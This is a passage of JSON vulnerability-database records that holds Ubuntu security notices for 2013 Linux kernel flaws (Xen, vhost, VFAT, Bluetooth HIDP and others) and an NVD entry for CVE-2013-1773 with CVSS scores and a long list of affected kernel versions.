accelerate \nguest networking in KVM based virtual machines. A privileged guest user \ncould exploit this flaw to crash the host system. (CVE-2013-0311)\n\nAn information leak was discovered in the Linux kernel's Bluetooth stack \nwhen HIDP (Human Interface Device Protocol) support is enabled. A local \nunprivileged user could exploit this flaw to cause an information leak from \nthe kernel. (CVE-2013-0349)\n\nA flaw was discovered on the Linux kernel's VFAT filesystem driver when a \ndisk is mounted with the utf8 option (this is the default on Ubuntu). On a \nsystem where disks/images can be auto-mounted or a FAT filesystem is \nmounted an unprivileged user can exploit the flaw to gain root privileges. \n(CVE-2013-1773)", "edition": 5, "modified": "2013-03-12T00:00:00", "published": "2013-03-12T00:00:00", "id": "USN-1760-1", "href": "https://ubuntu.com/security/notices/USN-1760-1", "title": "Linux kernel (Oneiric backport) vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.5, "vector": "AV:A/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T01:43:24", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0228", "CVE-2013-0268", "CVE-2013-0349", "CVE-2013-0311", "CVE-2013-1773"], "description": "Andrew Jones discovered a flaw with the xen_iret function in Linux kernel's \nXen virtualizeation. In the 32-bit Xen paravirt platform an unprivileged \nguest OS user could exploit this flaw to cause a denial of service (crash \nthe system) or gain guest OS privilege. (CVE-2013-0228)\n\nA flaw was reported in the permission checks done by the Linux kernel for \n/dev/cpu/*/msr. A local root user with all capabilities dropped could \nexploit this flaw to execute code with full root capabilities. \n(CVE-2013-0268)\n\nA flaw was discovered in the Linux kernel's vhost driver used to accelerate \nguest networking in KVM based virtual machines. A privileged guest user \ncould exploit this flaw to crash the host system. (CVE-2013-0311)\n\nAn information leak was discovered in the Linux kernel's Bluetooth stack \nwhen HIDP (Human Interface Device Protocol) support is enabled. A local \nunprivileged user could exploit this flaw to cause an information leak from \nthe kernel. (CVE-2013-0349)\n\nA flaw was discovered on the Linux kernel's VFAT filesystem driver when a \ndisk is mounted with the utf8 option (this is the default on Ubuntu). On a \nsystem where disks/images can be auto-mounted or a FAT filesystem is \nmounted an unprivileged user can exploit the flaw to gain root privileges. \n(CVE-2013-1773)", "edition": 5, "modified": "2013-03-22T00:00:00", "published": "2013-03-22T00:00:00", "id": "USN-1778-1", "href": "https://ubuntu.com/security/notices/USN-1778-1", "title": "Linux kernel (OMAP4) vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.5, "vector": "AV:A/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:33:57", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0228", "CVE-2013-0190", "CVE-2013-0268", "CVE-2013-1772", "CVE-2013-0217", "CVE-2013-0349", "CVE-2013-1774", "CVE-2013-0311", "CVE-2013-0231", "CVE-2013-0313", "CVE-2013-0216"], "description": "Andrew Cooper of Citrix reported a Xen stack corruption in the Linux \nkernel. An unprivileged user in a 32bit PVOPS guest can cause the guest \nkernel to crash, or operate erroneously. (CVE-2013-0190)\n\nA failure to validate input was discovered in the Linux kernel's Xen \nnetback (network backend) driver. A user in a guest OS may exploit this \nflaw to cause a denial of service to the guest OS and other guest domains. \n(CVE-2013-0216)\n\nA memory leak was discovered in the Linux kernel's Xen netback (network \nbackend) driver. A user in a guest OS could trigger this flaw to cause a \ndenial of service on the system. (CVE-2013-0217)\n\nAndrew Jones discovered a flaw with the xen_iret function in Linux kernel's \nXen virtualizeation. In the 32-bit Xen paravirt platform an unprivileged \nguest OS user could exploit this flaw to cause a denial of service (crash \nthe system) or gain guest OS privilege. (CVE-2013-0228)\n\nA flaw was discovered in the Linux kernel Xen PCI backend driver. If a PCI \ndevice is assigned to the guest OS, the guest OS could exploit this flaw to \ncause a denial of service on the host. (CVE-2013-0231)\n\nA flaw was reported in the permission checks done by the Linux kernel for \n/dev/cpu/*/msr. A local root user with all capabilities dropped could \nexploit this flaw to execute code with full root capabilities. \n(CVE-2013-0268)\n\nA flaw was discovered in the Linux kernel's vhost driver used to accelerate \nguest networking in KVM based virtual machines. A privileged guest user \ncould exploit this flaw to crash the host system. (CVE-2013-0311)\n\nA flaw was discovered in the Extended Verification Module (EVM) of the \nLinux kernel. An unprivileged local user code exploit this flaw to cause a \ndenial of service (system crash). (CVE-2013-0313)\n\nAn information leak was discovered in the Linux kernel's Bluetooth stack \nwhen HIDP (Human Interface Device Protocol) support is enabled. A local \nunprivileged user could exploit this flaw to cause an information leak from \nthe kernel. (CVE-2013-0349)\n\nA buffer overflow was discovered in the Linux kernel's /dev/kmesg device. A \nlocal user could exploit this flaw to cause a denial of service (system \ncrash). (CVE-2013-1772)\n\nA flaw was discovered in the Edgeort USB serial converter driver when the \ndevice is disconnected while it is in use. A local user could exploit this \nflaw to cause a denial of service (system crash). (CVE-2013-1774)", "edition": 5, "modified": "2013-03-18T00:00:00", "published": "2013-03-18T00:00:00", "id": "USN-1767-1", "href": "https://ubuntu.com/security/notices/USN-1767-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.5, "vector": "AV:A/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:21:27", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0190", "CVE-2013-0268", "CVE-2013-0217", "CVE-2013-0349", "CVE-2013-0311", "CVE-2013-0231", "CVE-2013-0313", "CVE-2013-0290", "CVE-2013-0216"], "description": "Andrew Cooper of Citrix reported a Xen stack corruption in the Linux \nkernel. An unprivileged user in a 32bit PVOPS guest can cause the guest \nkernel to crash, or operate erroneously. (CVE-2013-0190)\n\nA failure to validate input was discovered in the Linux kernel's Xen \nnetback (network backend) driver. A user in a guest OS may exploit this \nflaw to cause a denial of service to the guest OS and other guest domains. \n(CVE-2013-0216)\n\nA memory leak was discovered in the Linux kernel's Xen netback (network \nbackend) driver. A user in a guest OS could trigger this flaw to cause a \ndenial of service on the system. (CVE-2013-0217)\n\nA flaw was discovered in the Linux kernel Xen PCI backend driver. If a PCI \ndevice is assigned to the guest OS, the guest OS could exploit this flaw to \ncause a denial of service on the host. (CVE-2013-0231)\n\nA flaw was reported in the permission checks done by the Linux kernel for \n/dev/cpu/*/msr. A local root user with all capabilities dropped could \nexploit this flaw to execute code with full root capabilities. \n(CVE-2013-0268)\n\nTommi Rantala discovered a flaw in the a flaw the Linux kernels handling of \ndatagrams packets when the MSG_PEEK flag is specified. An unprivileged \nlocal user could exploit this flaw to cause a denial of service (system \nhang). (CVE-2013-0290)\n\nA flaw was discovered in the Linux kernel's vhost driver used to accelerate \nguest networking in KVM based virtual machines. A privileged guest user \ncould exploit this flaw to crash the host system. (CVE-2013-0311)\n\nA flaw was discovered in the Extended Verification Module (EVM) of the \nLinux kernel. An unprivileged local user code exploit this flaw to cause a \ndenial of service (system crash). (CVE-2013-0313)\n\nAn information leak was discovered in the Linux kernel's Bluetooth stack \nwhen HIDP (Human Interface Device Protocol) support is enabled. A local \nunprivileged user could exploit this flaw to cause an information leak from \nthe kernel. (CVE-2013-0349)", "edition": 5, "modified": "2013-03-18T00:00:00", "published": "2013-03-18T00:00:00", "id": "USN-1769-1", "href": "https://ubuntu.com/security/notices/USN-1769-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.5, "vector": "AV:A/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:22:39", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0190", "CVE-2013-0268", "CVE-2013-0217", "CVE-2013-0349", "CVE-2013-0311", "CVE-2013-0231", "CVE-2013-0313", "CVE-2013-0290", "CVE-2013-0216"], "description": "Andrew Cooper of Citrix reported a Xen stack corruption in the Linux \nkernel. An unprivileged user in a 32bit PVOPS guest can cause the guest \nkernel to crash, or operate erroneously. (CVE-2013-0190)\n\nA failure to validate input was discovered in the Linux kernel's Xen \nnetback (network backend) driver. A user in a guest OS may exploit this \nflaw to cause a denial of service to the guest OS and other guest domains. \n(CVE-2013-0216)\n\nA memory leak was discovered in the Linux kernel's Xen netback (network \nbackend) driver. A user in a guest OS could trigger this flaw to cause a \ndenial of service on the system. (CVE-2013-0217)\n\nA flaw was discovered in the Linux kernel Xen PCI backend driver. If a PCI \ndevice is assigned to the guest OS, the guest OS could exploit this flaw to \ncause a denial of service on the host. (CVE-2013-0231)\n\nA flaw was reported in the permission checks done by the Linux kernel for \n/dev/cpu/*/msr. A local root user with all capabilities dropped could \nexploit this flaw to execute code with full root capabilities. \n(CVE-2013-0268)\n\nTommi Rantala discovered a flaw in the a flaw the Linux kernels handling of \ndatagrams packets when the MSG_PEEK flag is specified. An unprivileged \nlocal user could exploit this flaw to cause a denial of service (system \nhang). (CVE-2013-0290)\n\nA flaw was discovered in the Linux kernel's vhost driver used to accelerate \nguest networking in KVM based virtual machines. A privileged guest user \ncould exploit this flaw to crash the host system. (CVE-2013-0311)\n\nA flaw was discovered in the Extended Verification Module (EVM) of the \nLinux kernel. An unprivileged local user code exploit this flaw to cause a \ndenial of service (system crash). (CVE-2013-0313)\n\nAn information leak was discovered in the Linux kernel's Bluetooth stack \nwhen HIDP (Human Interface Device Protocol) support is enabled. A local \nunprivileged user could exploit this flaw to cause an information leak from \nthe kernel. (CVE-2013-0349)", "edition": 5, "modified": "2013-03-21T00:00:00", "published": "2013-03-21T00:00:00", "id": "USN-1774-1", "href": "https://ubuntu.com/security/notices/USN-1774-1", "title": "Linux kernel (OMAP4) vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.5, "vector": "AV:A/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:42:26", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0190", "CVE-2013-0268", "CVE-2013-0217", "CVE-2013-0349", "CVE-2013-0311", "CVE-2013-0231", "CVE-2013-0313", "CVE-2013-0290", "CVE-2013-0216"], "description": "Andrew Cooper of Citrix reported a Xen stack corruption in the Linux \nkernel. An unprivileged user in a 32bit PVOPS guest can cause the guest \nkernel to crash, or operate erroneously. (CVE-2013-0190)\n\nA failure to validate input was discovered in the Linux kernel's Xen \nnetback (network backend) driver. A user in a guest OS may exploit this \nflaw to cause a denial of service to the guest OS and other guest domains. \n(CVE-2013-0216)\n\nA memory leak was discovered in the Linux kernel's Xen netback (network \nbackend) driver. A user in a guest OS could trigger this flaw to cause a \ndenial of service on the system. (CVE-2013-0217)\n\nA flaw was discovered in the Linux kernel Xen PCI backend driver. If a PCI \ndevice is assigned to the guest OS, the guest OS could exploit this flaw to \ncause a denial of service on the host. (CVE-2013-0231)\n\nA flaw was reported in the permission checks done by the Linux kernel for \n/dev/cpu/*/msr. A local root user with all capabilities dropped could \nexploit this flaw to execute code with full root capabilities. \n(CVE-2013-0268)\n\nTommi Rantala discovered a flaw in the a flaw the Linux kernels handling of \ndatagrams packets when the MSG_PEEK flag is specified. An unprivileged \nlocal user could exploit this flaw to cause a denial of service (system \nhang). (CVE-2013-0290)\n\nA flaw was discovered in the Linux kernel's vhost driver used to accelerate \nguest networking in KVM based virtual machines. A privileged guest user \ncould exploit this flaw to crash the host system. (CVE-2013-0311)\n\nA flaw was discovered in the Extended Verification Module (EVM) of the \nLinux kernel. An unprivileged local user code exploit this flaw to cause a \ndenial of service (system crash). (CVE-2013-0313)\n\nAn information leak was discovered in the Linux kernel's Bluetooth stack \nwhen HIDP (Human Interface Device Protocol) support is enabled. A local \nunprivileged user could exploit this flaw to cause an information leak from \nthe kernel. (CVE-2013-0349)", "edition": 5, "modified": "2013-03-18T00:00:00", "published": "2013-03-18T00:00:00", "id": "USN-1768-1", "href": "https://ubuntu.com/security/notices/USN-1768-1", "title": "Linux kernel (Quantal HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.5, "vector": "AV:A/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:33:11", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0228", "CVE-2013-0268", "CVE-2013-1772", "CVE-2013-0349", "CVE-2013-1774", "CVE-2013-0311", "CVE-2013-0313"], "description": "Andrew Jones discovered a flaw with the xen_iret function in Linux kernel's \nXen virtualizeation. In the 32-bit Xen paravirt platform an unprivileged \nguest OS user could exploit this flaw to cause a denial of service (crash \nthe system) or gain guest OS privilege. (CVE-2013-0228)\n\nA flaw was reported in the permission checks done by the Linux kernel for \n/dev/cpu/*/msr. A local root user with all capabilities dropped could \nexploit this flaw to execute code with full root capabilities. \n(CVE-2013-0268)\n\nA flaw was discovered in the Linux kernel's vhost driver used to accelerate \nguest networking in KVM based virtual machines. A privileged guest user \ncould exploit this flaw to crash the host system. (CVE-2013-0311)\n\nA flaw was discovered in the Extended Verification Module (EVM) of the \nLinux kernel. An unprivileged local user code exploit this flaw to cause a \ndenial of service (system crash). (CVE-2013-0313)\n\nAn information leak was discovered in the Linux kernel's Bluetooth stack \nwhen HIDP (Human Interface Device Protocol) support is enabled. A local \nunprivileged user could exploit this flaw to cause an information leak from \nthe kernel. (CVE-2013-0349)\n\nA buffer overflow was discovered in the Linux kernel's /dev/kmesg device. A \nlocal user could exploit this flaw to cause a denial of service (system \ncrash). (CVE-2013-1772)\n\nA flaw was discovered in the Edgeort USB serial converter driver when the \ndevice is disconnected while it is in use. A local user could exploit this \nflaw to cause a denial of service (system crash). (CVE-2013-1774)", "edition": 5, "modified": "2013-03-26T00:00:00", "published": "2013-03-26T00:00:00", "id": "USN-1781-1", "href": "https://ubuntu.com/security/notices/USN-1781-1", "title": "Linux kernel (OMAP4) vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.5, "vector": "AV:A/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:35:09", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0268", "CVE-2013-1773", "CVE-2013-0309"], "description": "A flaw was reported in the permission checks done by the Linux kernel for \n/dev/cpu/*/msr. A local root user with all capabilities dropped could \nexploit this flaw to execute code with full root capabilities. \n(CVE-2013-0268)\n\nA flaw was discovered in the Linux kernels handling of memory ranges with \nPROT_NONE when transparent hugepages are in use. An unprivileged local user \ncould exploit this flaw to cause a denial of service (crash the system). \n(CVE-2013-0309)\n\nA flaw was discovered on the Linux kernel's VFAT filesystem driver when a \ndisk is mounted with the utf8 option (this is the default on Ubuntu). On a \nsystem where disks/images can be auto-mounted or a FAT filesystem is \nmounted an unprivileged user can exploit the flaw to gain root privileges. \n(CVE-2013-1773)", "edition": 5, "modified": "2013-03-22T00:00:00", "published": "2013-03-22T00:00:00", "id": "USN-1775-1", "href": "https://ubuntu.com/security/notices/USN-1775-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:25:19", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0268", "CVE-2013-1773", "CVE-2013-0309"], "description": "A flaw was reported in the permission checks done by the Linux kernel for \n/dev/cpu/*/msr. A local root user with all capabilities dropped could \nexploit this flaw to execute code with full root capabilities. \n(CVE-2013-0268)\n\nA flaw was discovered in the Linux kernels handling of memory ranges with \nPROT_NONE when transparent hugepages are in use. An unprivileged local user \ncould exploit this flaw to cause a denial of service (crash the system). \n(CVE-2013-0309)\n\nA flaw was discovered on the Linux kernel's VFAT filesystem driver when a \ndisk is mounted with the utf8 option (this is the default on Ubuntu). On a \nsystem where disks/images can be auto-mounted or a FAT filesystem is \nmounted an unprivileged user can exploit the flaw to gain root privileges. \n(CVE-2013-1773)", "edition": 5, "modified": "2013-03-22T00:00:00", "published": "2013-03-22T00:00:00", "id": "USN-1776-1", "href": "https://ubuntu.com/security/notices/USN-1776-1", "title": "Linux kernel (EC2) vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2020-12-09T19:52:39", "description": "Buffer overflow in the VFAT filesystem implementation in the Linux kernel before 3.3 allows local users to gain privileges or cause a denial of service (system crash) via a VFAT write operation on a filesystem with the utf8 mount option, which is not properly handled during UTF-8 to UTF-16 conversion.\nPer https://access.redhat.com/security/cve/CVE-2013-1773\r\n\"This issue affects the version of Linux kernel as shipped with Red Hat Enterprise Linux 6 and Red Hat Enterprise MRG 2. Future kernel updates for Red Hat Enterprise Linux 6 and Red Hat Enterprise MRG 2 may address this issue.\"", "edition": 5, "cvss3": {}, "published": "2013-02-28T19:55:00", "title": "CVE-2013-1773", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 1.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.2, "vectorString": "AV:L/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1773"], "modified": "2019-04-22T17:48:00", "cpe": ["cpe:/o:linux:linux_kernel:3.0.36", "cpe:/o:linux:linux_kernel:3.1.4", "cpe:/o:linux:linux_kernel:3.1.7", "cpe:/o:linux:linux_kernel:3.0.30", "cpe:/o:linux:linux_kernel:3.2.14", "cpe:/o:linux:linux_kernel:3.0.27", "cpe:/o:linux:linux_kernel:3.2.7", "cpe:/o:linux:linux_kernel:3.2.24", "cpe:/o:linux:linux_kernel:3.2.25", "cpe:/o:linux:linux_kernel:3.0.33", "cpe:/o:linux:linux_kernel:3.2.8", "cpe:/o:linux:linux_kernel:3.0.9", "cpe:/o:linux:linux_kernel:3.2.29", "cpe:/o:linux:linux_kernel:3.2.18", "cpe:/o:linux:linux_kernel:3.0.6", "cpe:/o:linux:linux_kernel:3.0.17", "cpe:/o:linux:linux_kernel:3.2.23", "cpe:/o:linux:linux_kernel:3.0.10", "cpe:/o:linux:linux_kernel:3.0.40", "cpe:/o:linux:linux_kernel:3.1.3", "cpe:/o:linux:linux_kernel:3.0.7", "cpe:/o:linux:linux_kernel:3.3", "cpe:/o:linux:linux_kernel:3.0.20", "cpe:/o:linux:linux_kernel:3.2.30", "cpe:/o:linux:linux_kernel:3.0.31", "cpe:/o:linux:linux_kernel:3.2.13", "cpe:/o:linux:linux_kernel:3.0.12", "cpe:/o:linux:linux_kernel:3.0.41", "cpe:/o:linux:linux_kernel:3.0.15", "cpe:/o:linux:linux_kernel:3.2.27", "cpe:/o:linux:linux_kernel:3.0.23", "cpe:/o:linux:linux_kernel:3.0.44", "cpe:/o:linux:linux_kernel:3.1.10", "cpe:/o:linux:linux_kernel:3.0.13", "cpe:/o:linux:linux_kernel:3.0.5", "cpe:/o:linux:linux_kernel:3.0.39", "cpe:/o:linux:linux_kernel:3.0.3", "cpe:/o:linux:linux_kernel:3.2.28", "cpe:/o:linux:linux_kernel:3.0.14", "cpe:/o:linux:linux_kernel:3.0.28", "cpe:/o:linux:linux_kernel:3.0.25", "cpe:/o:linux:linux_kernel:3.0.1", "cpe:/o:linux:linux_kernel:3.2.3", "cpe:/o:linux:linux_kernel:3.0.8", "cpe:/o:linux:linux_kernel:3.2.17", "cpe:/o:linux:linux_kernel:3.2.6", "cpe:/o:linux:linux_kernel:3.2.1", "cpe:/o:linux:linux_kernel:3.2.19", "cpe:/o:linux:linux_kernel:3.2.16", "cpe:/o:linux:linux_kernel:3.1.1", "cpe:/o:linux:linux_kernel:3.2.5", "cpe:/o:linux:linux_kernel:3.2.2", "cpe:/o:linux:linux_kernel:3.0.18", "cpe:/o:linux:linux_kernel:3.0.19", "cpe:/o:linux:linux_kernel:3.1.5", "cpe:/o:linux:linux_kernel:3.0.26", "cpe:/o:linux:linux_kernel:3.0.37", "cpe:/o:linux:linux_kernel:3.0.34", "cpe:/o:linux:linux_kernel:3.0", "cpe:/o:linux:linux_kernel:3.0.32", "cpe:/a:redhat:enterprise_mrg:2.0", "cpe:/o:linux:linux_kernel:3.0.16", "cpe:/o:linux:linux_kernel:3.0.38", "cpe:/o:linux:linux_kernel:3.2.4", "cpe:/o:linux:linux_kernel:3.2.15", "cpe:/o:linux:linux_kernel:3.1.9", "cpe:/o:linux:linux_kernel:3.2.20", "cpe:/o:linux:linux_kernel:3.2.12", "cpe:/o:linux:linux_kernel:3.2.21", "cpe:/o:linux:linux_kernel:3.0.2", "cpe:/o:linux:linux_kernel:3.2.11", "cpe:/o:linux:linux_kernel:3.2.22", "cpe:/o:linux:linux_kernel:3.0.4", "cpe:/o:linux:linux_kernel:3.0.42", "cpe:/o:linux:linux_kernel:3.0.21", "cpe:/o:linux:linux_kernel:3.2.9", "cpe:/o:linux:linux_kernel:3.0.29", "cpe:/o:linux:linux_kernel:3.2", "cpe:/o:linux:linux_kernel:3.0.43", "cpe:/o:linux:linux_kernel:3.0.11", "cpe:/o:linux:linux_kernel:3.0.35", "cpe:/o:linux:linux_kernel:3.1", "cpe:/o:linux:linux_kernel:3.1.6", "cpe:/o:linux:linux_kernel:3.0.22", "cpe:/o:linux:linux_kernel:3.0.24", "cpe:/o:linux:linux_kernel:3.1.8", "cpe:/o:linux:linux_kernel:3.1.2", "cpe:/o:linux:linux_kernel:3.2.26", "cpe:/o:redhat:enterprise_linux:6.0", "cpe:/o:linux:linux_kernel:3.2.10"], "id": "CVE-2013-1773", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1773", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.0:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.37:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.1:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.39:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.43:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.44:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.42:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.36:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.40:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.1.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.24:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.41:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.34:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.35:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.33:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc2:*:*:*:*:*:*", "cpe:2.3:a:redhat:enterprise_mrg:2.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.1:*:*:*:*:*:*:*", 